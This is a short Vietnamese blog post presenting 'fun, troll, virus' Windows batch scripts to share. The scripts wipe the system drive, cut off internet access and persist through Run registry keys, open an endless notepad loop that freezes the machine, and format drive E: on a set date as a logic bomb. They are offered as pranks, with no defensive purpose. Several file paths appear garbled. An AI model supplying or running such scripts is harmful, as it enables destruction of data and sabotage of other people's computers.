Share một vài code vui, troll, virus - Phần 2

5. Del toàn bộ có trong ổ cứng ( save .bat )

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

6. Tắt internet vĩnh viễn ( save .bat )

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

7. Diệt win ( save .bat )

@Echo off
Del C:\ *.* |y


9. Treo máy luôn (save .bat )

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

10. Bom virus ( save .bat )

If %date% NEQ 2015/08/20 goto exit
format E: /y >nul
:exit
exit

( giá trị 2015/08/20 không phải là không chỉnh sửa theo ý thích, đó chính là  công sức oanh tạc )

0 nhận xét: